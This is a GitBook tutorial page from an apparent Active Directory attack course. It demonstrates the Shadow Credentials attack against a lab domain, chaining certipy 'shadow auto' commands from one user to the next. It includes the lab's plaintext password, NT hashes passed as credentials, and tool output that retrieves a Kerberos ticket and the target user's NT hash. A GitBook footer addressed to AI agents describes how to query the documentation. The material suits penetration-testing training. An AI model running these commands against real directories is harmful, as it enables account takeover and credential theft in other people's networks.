> For the complete documentation index, see [llms.txt](https://watchdogsacademy.gitbook.io/attacking-active-directory/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://watchdogsacademy.gitbook.io/attacking-active-directory/active-directory-certificate-services-adcs/shadow-credentials.md).

# Shadow Credentials

* Shadow credentials attack consist of using the GenericAll or GenericWrite privilege on a user or computer to set up the attribute msDS-KeyCredentialLink. explanations [here](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)
* You can get the dacl movement on shutdown (@\_nwodtuhs) website, the hacker recipes : <https://www.thehacker.recipes/ad/movement/dacl>
* This attack is very usefull when you got Write on another user.
* With genericWrite you can only do:
  * Target Kerberoasting : add an SPN to a user, do a kerberoasting, unset the spn. But the user password must be weak to the kerberoasting attack work.
  * Set up a logon script : change ldap parameters to set up a logon script. but it implies that the user log to his computer, an smb server or a share to offer the script and setup a script that bypass the security solutions in place)
  * shadow credentials : the attack we want to do, we need a cetificate service on the domain
* With GenericAll you can :
  * ForceChangePassword : but on a real pentest you don’t want to block a user by changing his password. And this is not very stealthy too. So if you can do another way this is fine :)
  * All the attacks available in the genericWrite part.

So if ADCS is enabled on the domain, and we got write privilege on msDS-KeyCredentialLink, we can do the shadow credentials attack to get a direct access on the user account. And this seems to be the better idea in this case on a real pentest.

* Shadow credentials is now include with certipy (this attack can also be done with [pywisker](https://github.com/ShutdownRepo/pywhisker) )

```
joaquin.Pereida@maryland.local > Marisol.Pedrosa > Teresa.Perez
```

```
enum4linux -u joaquin.Pereida@maryland.local -p horse -G 192.168.56.12
```

### Start BloodHound and Neo4j

```
sudo /usr/bin/./neo4j console
sudo /opt/tools/BloodHound4.2-ly4k/BloodHound-linux-x64/BloodHound  --no-sandbox --disable-dev-shm-usage
```

<figure><img src="/files/GH8vUXpXNUR5drobS3KN" alt=""><figcaption></figcaption></figure>

```
certipy shadow auto -u joaquin.Pereida@maryland.local -p 'horse' -account 'marisol.Pedrosa'
```

<figure><img src="/files/z5Pja449ybCLYUr04woP" alt=""><figcaption></figcaption></figure>

* And we can do the same from Marisol to teresa.Perez

```
certipy shadow auto -u marisol.Pedrosa@maryland.local -hashes 'fd208d19680104ddb8e3d90962c0334e' -account 'teresa.Perez'
```

<figure><img src="/files/ZtfXQAaOMZ99kbTjSKxv" alt=""><figcaption></figcaption></figure>

```
certipy shadow auto -u marisol.Pedrosa@maryland.local -hashes 'fd208d19680104ddb8e3d90962c0334e' -account 'teresa.Perez'
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Targeting user 'teresa.Perez'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '4d026165-030a-b52a-4ae9-9c0c28eb1fe9'
[*] Adding Key Credential with device ID '4d026165-030a-b52a-4ae9-9c0c28eb1fe9' to the Key Credentials for 'teresa.Perez'
[*] Successfully added Key Credential with device ID '4d026165-030a-b52a-4ae9-9c0c28eb1fe9' to the Key Credentials for 'teresa.Perez'
[*] Authenticating as 'teresa.Perez' with the certificate
[*] Using principal: teresa.perez@maryland.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'teresa.perez.ccache'
[*] Trying to retrieve NT hash for 'teresa.perez'
[*] Restoring the old Key Credentials for 'teresa.Perez'
[*] Successfully restored the old Key Credentials for 'teresa.Perez'
[*] NT hash for 'teresa.Perez': 4d737ec9ecf0b9955a161773cfed9611

```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://watchdogsacademy.gitbook.io/attacking-active-directory/active-directory-certificate-services-adcs/shadow-credentials.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.